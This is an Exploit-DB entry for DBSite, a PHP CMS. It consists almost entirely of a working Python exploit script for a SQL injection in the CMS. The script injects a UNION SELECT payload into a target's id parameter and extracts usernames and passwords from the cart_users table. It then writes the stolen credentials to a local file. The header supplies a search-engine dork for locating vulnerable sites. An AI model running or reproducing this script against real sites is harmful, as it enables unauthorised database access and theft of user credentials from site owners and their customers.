DBSite - SQL Injection

EDB-ID:

15512




Platform:

PHP

Date:

2010-11-13


#!/usr/bin/env python
# -*- coding: utf-8 -*-
# --------------------------------------------------------
# Exploit Title: DBSite Remote SQL Injection Vulnerability
# Date: 13/10/2010
# Author: God_Of_Pain
# Version: 1.0
# Tested on: Linux
# --------------------------------------------------------
# ========================================================
# Greetz to: LordTittiS3000 && System_Overide
# Example: http://www.site.it/index.php?id=[SQLi]
# Dork: intext:"Powered by DBSite" inurl:index.php?id=
# ========================================================

import urllib2
import sys
import re
import os
import time
import platform

if platform.system() == "Linux":
	os.system('clear')
elif platform.system() == "Windows":
	os.system('cls')

try:
	testo = """
	*****************************************************************
	*          +----------------------------------------+           *
	*          | CMS DBSite SQL Injection Vulnerability |           *
	*          +----------------------------------------+           *
	*          |     Bug Discovered  By God_Of_Pain     |           *
	*          +----------------------------------------+           *
	*          |      Exploit Coded By God_Of_Pain      |           *
	*          +----------------------------------------+           *
	* ============================================================  *
	* +----------------------------------------------------------+  *
	* |               Usage: Exploit.py <site> <id>              |  *
	* +----------------------------------------------------------+  *
	* |  python exploit.py <http://site.com/index.php?ID=> <10>  |  *
	* +----------------------------------------------------------+  *
	*****************************************************************

	"""
	print(testo)
	time.sleep(1)

	target = sys.argv[1]
	ID = sys.argv[2]
	http = "http://"
	sql = "+union+select+concat(0x3e3e3e,USERNAME,0x3a3a3a,PWD,0x3e3e3e),2,3+from+cart_users--"
	newid = "-"
	spa = " "

	if http in target:
		del(http)
	sqli = target + newid + ID + sql
	if spa in sqli:
		del(spa)
	print "Ok, Exploiting..."
	print ""
	time.sleep(1)
	print "Please Wait..."
	print ""
	time.sleep(1)
	try:
		prov = urllib2.urlopen(sqli).read()
		prov2 = re.findall(r">>>(.*)([0-9a-zA-Z])([^<>])(.*)>>>", prov)
		if len(prov2) > 1:
			print "+--------------+"
			print "| Exploit Done |"
			print "+--------------+"
			print "User & Pwd =>   " + prov2[0][0] + prov2[0][1]
			time.sleep(1)
			print ""
			print "Saving User && PWD in a .txt file..."
			print ""
			o = open("User&&PwdDBSiteExploit.txt", "w")
			o.write(prov2[0][0] + prov2[0][1])
			o.close()
			print "Saved!"
			print ""
			print "Thanks for using this Exploit!"
		else:
			print "+----------------------+"
			print "|    Exploit Failed    |"
			print "+----------------------+"
			print "|    I'm so sorry :(   |"
			print "+----------------------+"
	except urllib2.HTTPError:
		print "Sorry! Exploit Failed! There is an error :("
except IndexError:
	print "-* Good Luck! *-"

# The End! :)
# -------------------------------------
# http://oversecuritycrew.webnet32.com/
# -------------------------------------